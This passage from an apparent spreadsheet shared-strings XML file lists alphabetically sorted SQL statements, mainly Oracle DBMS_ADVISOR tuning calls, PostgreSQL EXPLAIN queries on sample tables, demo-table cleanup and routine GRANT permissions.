    <t xml:space="preserve">DBMS_OUTPUT.PUT_LINE ( '----------------------------------------' ) </t>
  </si>
  <si>
    <t xml:space="preserve">DBMS_OUTPUT.PUT_LINE ( ' =  =  =  =  =  =  =  =  =  =  =  =  =  =  =  =  =  =  =  =  =  =  =  =  =  =  =  =  =  =  =  =  =  =  =  =  =  =  =  =  = ' ) </t>
  </si>
  <si>
    <t xml:space="preserve">DBMS_OUTPUT.PUT_LINE ( ' =  =  =  =  =  =  =  =  = END RECOMMENDATIONS =  =  =  =  =  =  =  =  =  =  =  = ' ) </t>
  </si>
  <si>
    <t xml:space="preserve">DBMS_OUTPUT.PUT_LINE ( 'Action ID: ' || v_action ) </t>
  </si>
  <si>
    <t xml:space="preserve">DBMS_OUTPUT.PUT_LINE ( 'Attr1  ( name )  : ' || SUBSTR ( v_attr1,1,30  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve">DBMS_OUTPUT.PUT_LINE ( 'Attr2  ( tablespace ) : ' || SUBSTR ( v_attr2,1,30  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve">DBMS_OUTPUT.PUT_LINE ( 'Attr3 : ' || SUBSTR ( v_attr3,1,30  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve">DBMS_OUTPUT.PUT_LINE ( 'Attr4 : ' || v_attr4 ) </t>
  </si>
  <si>
    <t xml:space="preserve">DBMS_OUTPUT.PUT_LINE ( 'Attr5 : ' || v_attr5 ) </t>
  </si>
  <si>
    <t xml:space="preserve">DBMS_OUTPUT.PUT_LINE ( 'Command : ' || v_command ) </t>
  </si>
  <si>
    <t xml:space="preserve">DBMS_OUTPUT.PUT_LINE ( 'Task_name  =  ' || in_task_name ) </t>
  </si>
  <si>
    <t xml:space="preserve">DECLARE @SNO char ( 6 ) </t>
  </si>
  <si>
    <t xml:space="preserve">DECLARE sqlsetname VARCHAR2 ( 30 ) </t>
  </si>
  <si>
    <t>DELETE FROM lockdemo</t>
  </si>
  <si>
    <t>DELETE FROM lockdemo WHERE col  =  1</t>
  </si>
  <si>
    <t>DROP TABLE IF EXISTS lockdemo</t>
  </si>
  <si>
    <t>DROP TABLE temp</t>
  </si>
  <si>
    <t>DROP TABLE temp2</t>
  </si>
  <si>
    <t>DROP VIEW IF EXISTS lock_stat_view CASCADE</t>
  </si>
  <si>
    <t>DROP VIEW IF EXISTS lockview CASCADE</t>
  </si>
  <si>
    <t>DROP VIEW IF EXISTS lockview1 CASCADE</t>
  </si>
  <si>
    <t>DROP VIEW IF EXISTS lockview2 CASCADE</t>
  </si>
  <si>
    <t>END</t>
  </si>
  <si>
    <t>END $$ LANGUAGE plpgsql</t>
  </si>
  <si>
    <t>END LOOP</t>
  </si>
  <si>
    <t>END show_recm</t>
  </si>
  <si>
    <t>EXECUTE :create_mv_ddl : =  ' - CREATE MATERIALIZED VIEW cust_mv - ENABLE QUERY REWRITE AS - SELECT s.prod_id, s.cust_id, COUNT ( * )  cnt, SUM ( s.amount_sold )  sum_amount - FROM sales s, customers cs, countries cn - WHERE s.cust_id  =  cs.cust_id AND cs.country_id  =  cn.country_id - AND cn.country_name IN  ( ''USA'',''Canada'' )  - GROUP BY s.prod_id, s.cust_id - UNION - SELECT s.prod_id, s.cust_id, COUNT ( * )  cnt, SUM ( s.amount_sold )  sum_amount - FROM sales s, customers cs - WHERE s.cust_id  =  cs.cust_id AND s.cust_id IN  ( 1005,1010,1012 )  - GROUP BY s.prod_id, s.cust_id'</t>
  </si>
  <si>
    <t>EXECUTE :create_mv_ddl : =  ' - CREATE MATERIALIZED VIEW cust_mv - REFRESH FAST - DISABLE QUERY REWRITE AS - SELECT s.prod_id, s.cust_id, SUM ( s.amount_sold )  sum_amount - FROM sales s, customers cs - WHERE s.cust_id  =  cs.cust_id - GROUP BY s.prod_id, s.cust_id'</t>
  </si>
  <si>
    <t>EXECUTE :create_mv_ddl : =  '- CREATE MATERIALIZED VIEW cust_mv - REFRESH FAST ON DEMAND - ENABLE QUERY REWRITE AS - SELECT s.prod_id, s.cust_id, COUNT ( * )  cnt, SUM ( s.amount_sold )  sum_amount - FROM sales s, customers cs - WHERE s.cust_id  =  cs.cust_id AND s.cust_id IN  ( 2005,1020 )  - GROUP BY s.prod_id, s.cust_id UNION - SELECT s.prod_id, s.cust_id, COUNT ( * )  cnt, SUM ( s.amount_sold )  sum_amount - FROM sales s, customers cs - WHERE s.cust_id  =  cs.cust_id AND s.cust_id IN  ( 1005,1010,1012 )  - GROUP BY s.prod_id, s.cust_id'</t>
  </si>
  <si>
    <t>EXECUTE :name : =  'MYWORKLOAD'</t>
  </si>
  <si>
    <t>EXECUTE :sql_stmt : =  'SELECT COUNT ( * )  FROM customers - WHERE cust_state_province = ''CA'''</t>
  </si>
  <si>
    <t>EXECUTE :sql_text : =  'SELECT AVG ( amount_sold )  FROM sales'</t>
  </si>
  <si>
    <t>EXECUTE :sql_text2 : =  'SELECT AVG ( amount_sold )  FROM sales'</t>
  </si>
  <si>
    <t>EXECUTE :sqlsetname : =  'MY_STS_WORKLOAD'</t>
  </si>
  <si>
    <t>EXECUTE :task_cust_mv : =  'cust_mv'</t>
  </si>
  <si>
    <t>EXECUTE :task_cust_mv : =  'cust_mv2'</t>
  </si>
  <si>
    <t>EXECUTE :task_cust_mv : =  'cust_mv3'</t>
  </si>
  <si>
    <t>EXECUTE :task_name : =  'MYTASK'</t>
  </si>
  <si>
    <t>EXECUTE :task_name : =  'MY_EVAL_TASK'</t>
  </si>
  <si>
    <t>EXECUTE :task_name : =  'MY_QUICKTUNE_TASK'</t>
  </si>
  <si>
    <t>EXECUTE :task_name2 : =  'MYTASK2'</t>
  </si>
  <si>
    <t>EXECUTE :template_name : =  'MY_TEMPLATE'</t>
  </si>
  <si>
    <t>EXECUTE :template_name : =  'MY_WK_TEMPLATE'</t>
  </si>
  <si>
    <t>EXECUTE :workload_name : =  'MYWORKLOAD'</t>
  </si>
  <si>
    <t>EXECUTE :workload_name : =  'MY_CACHE_WORKLOAD'</t>
  </si>
  <si>
    <t>EXECUTE :workload_name : =  'MY_WORKLOAD'</t>
  </si>
  <si>
    <t>EXECUTE :workload_name : =  'SCHEMA_WKLD'</t>
  </si>
  <si>
    <t>EXECUTE :workload_name2 : =  'MYWORKLOAD2'</t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.ADD_SQLWKLD_REF ( 'MYTASK', 'MYWORKLOAD' ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.ADD_SQLWKLD_REF ( 'MYTASK','MYWORKLOAD' ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.ADD_SQLWKLD_REF ( :task_name, :workload_name ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.ADD_SQLWKLD_REF ( :task_name2, :workload_name2 ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.ADD_SQLWKLD_STATEMENT  (  - 'MYWORKLOAD', 'MONTHLY', 'ROLLUP', 0,0,0,0,1,0,10,1,SYSDATE,1, - 'SH', 'SELECT count ( count ( *  )  )   FROM sales GROUP BY prod_id' ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.ADD_SQLWKLD_STATEMENT  (  - 'MYWORKLOAD', 'MONTHLY', 'ROLLUP', priority = &gt;1, executions = &gt;10, - username  = &gt; 'SH', sql_text  = &gt; :sql_text ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.ADD_SQLWKLD_STATEMENT  (  - :workload_name2, 'MONTHLY', 'ROLLUP', priority = &gt;1, executions = &gt;10, - username  = &gt; 'SH', sql_text  = &gt; :sql_text2 ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.ADD_SQLWKLD_STATEMENT  ( :workload_name, username  = &gt; 'SH', - priority  = &gt; 1, executions  = &gt; 10, sql_text  = &gt; - 'select count ( * )  from customers where cust_state_province = ''CA''' ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.CANCEL_TASK ( 'MYTASK' ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.CREATE_FILE ( DBMS_ADVISOR.GET_TASK_SCRIPT ( 'MYTASK' ) , 'ADVISOR_RESULTS','advscript.sql' ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.CREATE_FILE ( DBMS_ADVISOR.GET_TASK_SCRIPT ( 'cust_mv2' ) ,- 'TUNE_RESULTS', 'mv_create2.sql' ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.CREATE_FILE ( DBMS_ADVISOR.GET_TASK_SCRIPT ( 'cust_mv3' ) , - 'TUNE_RESULTS', 'mv_create3.sql' ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.CREATE_FILE ( DBMS_ADVISOR.GET_TASK_SCRIPT ( :task_cust_mv ) , - 'TUNE_RESULTS', 'mv_create.sql' ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.CREATE_FILE ( DBMS_ADVISOR.GET_TASK_SCRIPT ( :task_name ) , - 'TUNE_RESULTS', 'mv_create.sql' ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.CREATE_FILE ( DBMS_ADVISOR.GET_TASK_SCRIPT ( :task_name ) ,- 'ADVISOR_RESULTS', 'Example1_script.sql' ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.CREATE_FILE ( DBMS_ADVISOR.GET_TASK_SCRIPT ( :task_name ) ,- 'ADVISOR_RESULTS', 'Example2_script.sql' ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.CREATE_FILE ( DBMS_ADVISOR.GET_TASK_SCRIPT ( :task_name ) ,- 'ADVISOR_RESULTS', 'Example3_script.sql' ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.CREATE_FILE ( DBMS_ADVISOR.GET_TASK_SCRIPT ( :task_name, 'UNDO' ) , 'TUNE_RESULTS', 'mv_undo.sql' ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.CREATE_SQLWKLD  (  - :workload_name, 'This is my first workload', 'MY_WK_TEMPLATE' ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.CREATE_SQLWKLD  ( :workload_name ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.CREATE_SQLWKLD ( :name ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.CREATE_SQLWKLD ( :template_name, is_template = &gt;'TRUE' ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.CREATE_SQLWKLD ( :workload_name ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.CREATE_SQLWKLD ( :workload_name,'This is my first workload' ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.CREATE_SQLWKLD ( :workload_name2,'This is my test workload' ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.CREATE_TASK  (  - 'SQL Access Advisor', :task_id, :task_name, template  = &gt; 'MY_TEMPLATE' ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.CREATE_TASK  (  - 'SQL Access Advisor',:template_id, :template_name, is_template = &gt;'TRUE' ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.CREATE_TASK  ( 'SQL Access Advisor', :task_id, :task_name ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.CREATE_TASK  ( 'SQL Access Advisor', :task_id2, - :task_name2 ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.CREATE_TASK ( 'SQL Access Advisor', - :task_id, :task_name, template = &gt;'SQLACCESS_WAREHOUSE' ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.CREATE_TASK ( 'SQL Access Advisor', :task_id, - :task_name, template = &gt;'MY_TEMPLATE' ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.CREATE_TASK ( 'SQL Access Advisor', :task_id, :task_name ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.CREATE_TASK ( 'SQL Access Advisor','MYTASK' ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.CREATE_TASK ( 'SQL Access Advisor',:template_id, - :template_name, is_template  = &gt; 'TRUE' ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.DELETE_SQLWKLD ( '%' ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.DELETE_SQLWKLD ( 'MYWORKLOAD' ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.DELETE_SQLWKLD_REF ( 'MYTASK', 'MYWORKLOAD' ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.DELETE_SQLWKLD_STATEMENT ( 'MYWORKLOAD', 10 ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.DELETE_TASK ( '%' ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.DELETE_TASK ( 'MYTASK' ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.DELETE_TASK ( 'MY_TEMPLATE' ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.DELETE_TASK ( 'TUNING1' ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.EXECUTE_TASK ( 'MYTASK' ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.EXECUTE_TASK ( :task_name ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.EXECUTE_TASK ( :task_name2 ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.IMPORT_SQLWKLD_SCHEMA  (  - :workload_name, 'NEW', 2, :saved_stmts, :failed_stmts ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.IMPORT_SQLWKLD_SQLCACHE  (  - :workload_name, 'APPEND', 2, :saved_stmts, :failed_stmts ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.IMPORT_SQLWKLD_SQLCACHE  ( - 'MYWORKLOAD', 'APPEND', 2, :saved_stmts, :failed_stmts ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.IMPORT_SQLWKLD_STS  ( :workload_name , - :sqlsetname, 'NEW', 1, :saved_stmts, :failed_stmts ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.IMPORT_SQLWKLD_USER  (  - :workload_name, 'APPEND', 'SH', 'USER_WORKLOAD', :saved_stmts,:failed_stmts ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.IMPORT_SQLWKLD_USER  (  - :workload_name, 'APPEND', 'SH','USER_WORKLOAD', :saved_stmts, :failed_stmts ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.IMPORT_SQLWKLD_USER  ( :workload_name, 'APPEND', 'SH', - 'USER_WORKLOAD', :saved_stmts, :failed_stmts ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.IMPORT_SQLWKLD_USER (  - 'MYWORKLOAD', 'NEW', 'SH', 'USER_WORKLOAD', :saved_stmts, :failed_stmts ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.MARK_RECOMMENDATION ( 'MYTASK', 2, 'REJECT' ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.QUICK_TUNE ( DBMS_ADVISOR.SQLACCESS_ADVISOR, - :task_name, :sql_stmt ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.RESET_SQLWKLD ( 'MYWORKLOAD' ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.RESET_TASK ( 'MYTASK' ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.SET_SQLWKLD_PARAMETER  (  - 'MYWORKLOAD', 'ORDER_LIST', 'OPTIMIZER_COST' ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.SET_SQLWKLD_PARAMETER  (  - :workload_name, 'USERNAME_LIST', 'SH' ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.SET_SQLWKLD_PARAMETER  ( :workload_name, - 'USERNAME_LIST', 'SH' ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.SET_SQLWKLD_PARAMETER (  - :template_name, 'USERNAME_LIST', 'SH' ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.SET_SQLWKLD_PARAMETER ( 'MYWORKLOAD', 'JOURNALING', 0 ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.SET_SQLWKLD_PARAMETER ( 'MYWORKLOAD', 'JOURNALING', 4 ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.SET_SQLWKLD_PARAMETER ( 'MYWORKLOAD', 'SQL_LIMIT', 3 ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.SET_TASK_PARAMETER  (  - 'MYTASK', 'VALID_TABLE_LIST', 'SH.SALES, SH.CUSTOMERS' ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.SET_TASK_PARAMETER  (  - :task_name, 'EXECUTION_TYPE', 'INDEX_ONLY' ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.SET_TASK_PARAMETER  (  - :template_name, 'DEF_INDEX_OWNER', 'SH' ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.SET_TASK_PARAMETER  (  - :template_name, 'DEF_INDEX_TABLESPACE', 'SH_INDEXES' ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.SET_TASK_PARAMETER  (  - :template_name, 'DEF_MVIEW_OWNER', 'SH' ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.SET_TASK_PARAMETER  (  - :template_name, 'DEF_MVIEW_TABLESPACE', 'SH_MVIEWS' ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.SET_TASK_PARAMETER  (  - :template_name, 'INDEX_NAME_TEMPLATE', 'SH_IDX$$_&lt;SEQ&gt;' ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.SET_TASK_PARAMETER  (  - :template_name, 'MVIEW_NAME_TEMPLATE', 'SH_MV$$_&lt;SEQ&gt;' ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.SET_TASK_PARAMETER  ( :task_name, 'EVALUATION_ONLY', 'TRUE' ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.SET_TASK_PARAMETER ( 'MYTASK', 'JOURNALING', 0 ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.SET_TASK_PARAMETER ( 'MYTASK', 'JOURNALING', 4 ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.SET_TASK_PARAMETER ( 'MYTASK', 'RECOMMEND_MV_EXACT_TEXT_MATCH', 'FALSE' ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.SET_TASK_PARAMETER ( 'MYTASK', 'RECOMMEND_MV_EXACT_TEXT_MATCH', 'TRUE' ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.SET_TASK_PARAMETER ( 'MYTASK','STORAGE_CHANGE', 100 ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.SET_TASK_PARAMETER ( :task_name, 'STORAGE_CHANGE', 100 ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.TUNE_MVIEW ( :task_cust_mv, :create_mv_ddl ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.UPDATE_REC_ATTRIBUTES ( :task_name2, 1, 2, 'TABLESPACE', - 'SH_MVIEWS' ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.UPDATE_SQLWKLD_ATTRIBUTES  (  - 'MYWORKLOAD', read_only = &gt; 'FALSE' ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.UPDATE_SQLWKLD_ATTRIBUTES  (  - 'MYWORKLOAD', read_only = &gt; 'TRUE' ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.UPDATE_SQLWKLD_STATEMENT (  - 'MYWORKLOAD', 2, priority = &gt;3 ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.UPDATE_TASK_ATTRIBUTES ( 'MYTASK', 'TUNING1' ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.UPDATE_TASK_ATTRIBUTES ( 'TUNING1', is_template = &gt;'TRUE' ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.UPDATE_TASK_ATTRIBUTES ( 'TUNING1', read_only  = &gt; 'FALSE' ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE DBMS_ADVISOR.UPDATE_TASK_ATTRIBUTES ( 'TUNING1', read_only  = &gt; 'TRUE' ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE dbms_advisor.delete_sqlwkld ( :workload_name ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE dbms_advisor.delete_task ( 'MYTASK' ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE dbms_advisor.delete_task ( :task_name ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXECUTE show_recm ( :task_name ) </t>
  </si>
  <si>
    <t>EXIT when curs%NOTFOUND</t>
  </si>
  <si>
    <t xml:space="preserve">EXPLAIN SELECT * FROM TEST WHERE ID IN  ( 10, 20 )  AND DATA IN  ( 1, 2 ) </t>
  </si>
  <si>
    <t xml:space="preserve">EXPLAIN SELECT * FROM TEST WHERE ID IN ( 1, 1000 ) </t>
  </si>
  <si>
    <t>EXPLAIN SELECT COUNT ( * )  FROM TEST</t>
  </si>
  <si>
    <t>EXPLAIN SELECT DISTINCT TYPE FROM TEST ORDER BY TYPE LIMIT 3</t>
  </si>
  <si>
    <t>EXPLAIN SELECT ID X, COUNT ( * )  FROM TEST GROUP BY ID</t>
  </si>
  <si>
    <t>EXPLAIN SELECT MIN ( VALUE ) , MAX ( VALUE )  FROM TEST</t>
  </si>
  <si>
    <t>EXPLAIN SELECT TYPE,  ( SELECT VALUE FROM TEST T2 WHERE T.TYPE  =  T2.TYPE ORDER BY TYPE, VALUE LIMIT 1 )  MIN FROM  ( SELECT DISTINCT TYPE FROM TEST )  T ORDER BY TYPE</t>
  </si>
  <si>
    <t>EXPLAIN SELECT VALUE FROM TEST ORDER BY VALUE DESC LIMIT 10</t>
  </si>
  <si>
    <t>EXPLAIN SELECT VALUE FROM TEST ORDER BY VALUE LIMIT 10</t>
  </si>
  <si>
    <t>EXPLAIN SELECT letter FROM sample WHERE letter  =  'd'</t>
  </si>
  <si>
    <t>EXPLAIN SELECT letter FROM sample WHERE letter  =  'k'</t>
  </si>
  <si>
    <t>EXPLAIN SELECT letter FROM sample WHERE letter  =  'p'</t>
  </si>
  <si>
    <t>EXPLAIN SELECT sample1.junk FROM sample1 CROSS JOIN sample2</t>
  </si>
  <si>
    <t xml:space="preserve">EXPLAIN SELECT sample1.junk FROM sample1 JOIN sample2 ON  ( sample1.id  =  sample2.id ) </t>
  </si>
  <si>
    <t>EXPLAIN SELECT sample1.junk FROM sample1 JOIN sample2 ON  ( sample1.id  =  sample2.id )  WHERE sample2.id &gt; 33</t>
  </si>
  <si>
    <t xml:space="preserve">EXPLAIN SELECT sample1.junk FROM sample1 RIGHT OUTER JOIN sample2 ON  ( sample1.id  =  sample2.id ) </t>
  </si>
  <si>
    <t>EXPLAIN SELECT sample2.id, sample2.junk FROM sample1 JOIN sample2 ON  ( sample1.id  =  sample2.id )  ORDER BY 1 LIMIT 1</t>
  </si>
  <si>
    <t>EXPLAIN SELECT sample2.id, sample2.junk FROM sample1 JOIN sample2 ON  ( sample1.id  =  sample2.id )  ORDER BY 1 LIMIT 10</t>
  </si>
  <si>
    <t>EXPLAIN SELECT sample2.id, sample2.junk FROM sample1 JOIN sample2 ON  ( sample1.id  =  sample2.id )  ORDER BY 1 LIMIT 100</t>
  </si>
  <si>
    <t xml:space="preserve">EXPLAIN SELECT sample2.junk FROM sample1 JOIN sample2 ON  ( sample1.id  =  sample2.id ) </t>
  </si>
  <si>
    <t>EXPLAIN SELECT sample2.junk FROM sample1 JOIN sample2 ON  ( sample1.id  =  sample2.id )  WHERE sample1.id  =  33</t>
  </si>
  <si>
    <t>EXPLAIN SELECT sample2.junk FROM sample1 JOIN sample2 ON  ( sample1.id  =  sample2.id )  WHERE sample2.junk ~ '^aaa'</t>
  </si>
  <si>
    <t>EXPLAIN SELECT sample2.junk FROM sample1 JOIN sample2 ON  ( sample1.id  =  sample2.id )  WHERE sample2.junk ~ '^xxx'</t>
  </si>
  <si>
    <t xml:space="preserve">EXPLAIN SELECT sample2.junk FROM sample2 JOIN sample1 ON  ( sample2.id  =  sample1.id ) </t>
  </si>
  <si>
    <t>GO /* S has 5 rows: */ SELECT * FROM S</t>
  </si>
  <si>
    <t>GRANT ALL ON TABLE metadatacollectionschema.altidcollection TO omerouser</t>
  </si>
  <si>
    <t>GRANT ALL ON TABLE metadatacollectionschema.andsactivity TO omerouser</t>
  </si>
  <si>
    <t>GRANT ALL ON TABLE metadatacollectionschema.andsparty TO omerouser</t>
  </si>
  <si>
    <t>GRANT ALL ON TABLE metadatacollectionschema.andsservice TO omerouser</t>
  </si>
  <si>
    <t>GRANT ALL ON TABLE metadatacollectionschema.contributorcollection TO omerouser</t>
  </si>
  <si>
    <t>GRANT ALL ON TABLE metadatacollectionschema.custodiancollection TO omerouser</t>
  </si>
  <si>
    <t>GRANT ALL ON TABLE metadatacollectionschema.dataformatscollection TO omerouser</t>
  </si>
  <si>
    <t>GRANT ALL ON TABLE metadatacollectionschema.fundingcollection TO omerouser</t>
  </si>
  <si>
    <t>GRANT ALL ON TABLE metadatacollectionschema.guestusersgroup TO omerouser</t>
  </si>
  <si>
    <t>GRANT ALL ON TABLE metadatacollectionschema.metadatacollection TO omerouser</t>
  </si>
  <si>
    <t>GRANT ALL ON TABLE metadatacollectionschema.metadatamedia TO omerouser</t>
  </si>
  <si>
    <t>GRANT ALL ON TABLE metadatacollectionschema.microscopecollection TO omerouser</t>
  </si>
  <si>
    <t>GRANT ALL ON TABLE metadatacollectionschema.projectscollection TO omerouser</t>
  </si>
  <si>
    <t>GRANT ALL ON TABLE metadatacollectionschema.publishercollection TO omerouser</t>
  </si>
  <si>
    <t>GRANT ALL ON TABLE metadatacollectionschema.relatedurlscollection TO omerouser</t>
  </si>
  <si>
    <t>GRANT ALL ON TABLE metadatacollectionschema.subjectforcollection TO omerouser</t>
  </si>
  <si>
    <t>GRANT ALL ON TABLE metadatacollectionschema.subjectseoccollection TO omerouser</t>
  </si>
  <si>
    <t>GRANT EXECUTE ON FUNCTION sylph.add_link, sylph.add_news, sylph.add_article, sylph.add_comment, sylph.add_software, sylph.add_version TO GROUP sylph_web</t>
  </si>
  <si>
    <t>GRANT SELECT ON TABLE metadatacollectionschema.altidcollection TO hubuser</t>
  </si>
  <si>
    <t>GRANT SELECT ON TABLE metadatacollectionschema.andsactivity TO hubuser</t>
  </si>
  <si>
    <t>GRANT SELECT ON TABLE metadatacollectionschema.andsparty TO hubuser</t>
  </si>
  <si>
    <t>GRANT SELECT ON TABLE metadatacollectionschema.andsservice TO hubuser</t>
  </si>
  <si>
    <t>GRANT SELECT ON TABLE metadatacollectionschema.contributorcollection TO hubuser</t>
  </si>
  <si>
    <t>GRANT SELECT ON TABLE metadatacollectionschema.custodiancollection TO hubuser</t>
  </si>
  <si>
    <t>GRANT SELECT ON TABLE metadatacollectionschema.dataformatscollection TO hubuser</t>
  </si>
  <si>
    <t>GRANT SELECT ON TABLE metadatacollectionschema.fundingcollection TO hubuser</t>
  </si>
  <si>
    <t>GRANT SELECT ON TABLE metadatacollectionschema.guestusersgroup TO hubuser</t>
  </si>
  <si>
    <t>GRANT SELECT ON TABLE metadatacollectionschema.metadatacollection TO hubuser</t>
  </si>
  <si>
    <t>GRANT SELECT ON TABLE metadatacollectionschema.metadatamedia TO hubuser</t>
  </si>
  <si>
